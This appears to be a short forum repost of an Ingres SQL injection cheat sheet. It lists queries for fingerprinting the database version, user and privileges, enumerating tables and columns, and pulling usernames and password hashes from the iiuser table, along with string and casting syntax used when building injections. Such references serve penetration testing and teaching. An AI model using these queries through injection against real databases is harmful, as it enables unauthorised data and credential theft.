Nytro

Ingres SQL Injection Cheat Sheet

Version

select dbmsinfo('_version');

Comments

SELECT 123; -- comment

select 123; /* comment */

Current User

select dbmsinfo('session_user');

select dbmsinfo('system_user');

List Users

First connect to iidbdb, then:

select name, password from iiuser;

List Password Hashes

First connect to iidbdb, then:

select name, password from iiuser;

List Privileges

select dbmsinfo('db_admin');

select dbmsinfo('create_table');

select dbmsinfo('create_procedure');

select dbmsinfo('security_priv');

select dbmsinfo('select_syscat');

select dbmsinfo('db_privileges');

select dbmsinfo('current_priv_mask');

Current Database

select dbmsinfo('database');

List Columns

select column_name, column_datatype, table_name, table_owner from iicolumns;

List Tables

select table_name, table_owner from iitables;

select relid, relowner, relloc from iirelation;

select relid, relowner, relloc from iirelation where relowner != '$ingres';

Select Nth Row

Astoundingly, this doesn't seem to be possible! This is as close as you can get:

select top 10 blah from table;

select first 10 blah from table;

Select Nth Char

select substr('abc', 2, 1); -- returns 'b'

Casting

select cast(123 as varchar);

select cast('123' as integer);

String Concatenation

select 'abc' || 'def';
